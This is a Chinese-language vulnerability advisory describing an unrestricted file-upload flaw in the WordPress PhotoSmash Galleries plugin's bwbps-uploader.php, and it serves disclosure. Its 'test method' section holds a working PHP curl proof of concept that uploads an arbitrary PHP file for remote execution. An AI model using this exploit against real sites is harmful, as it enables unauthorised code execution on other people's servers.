漏洞起因
输入验证错误
危险等级
中
影响系统
WordPress PhotoSmash Galleries Plugin
不受影响系统
危害
远程攻击者可以利用漏洞可上传恶意文件并执行。
CVSSv2:
攻击所需条件
攻击者必须访问WordPress PhotoSmash Galleries。
漏洞信息
WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设自己的网志。
WordPress PhotoSmash Galleries插件’bwbps-uploader.php’脚本不正确校验用户上传的文件,允许远程攻击者利用漏洞提交特殊文件,并以WEB权限执行。
测试方法
<?php
$uploadfile=”file.php”;
$ch = curl_init(”
http://www.example.com/wordpress/wp-content/plugins/photosmash-galleries/bwbps-uploader.php
“);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array(‘FileData’=>”@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
?>
安全建议
厂商解决方案
目前没有详细解决方案提供:
http://smashly.net/
漏洞提供者
Ashiyane Digital Security Team
评论关闭。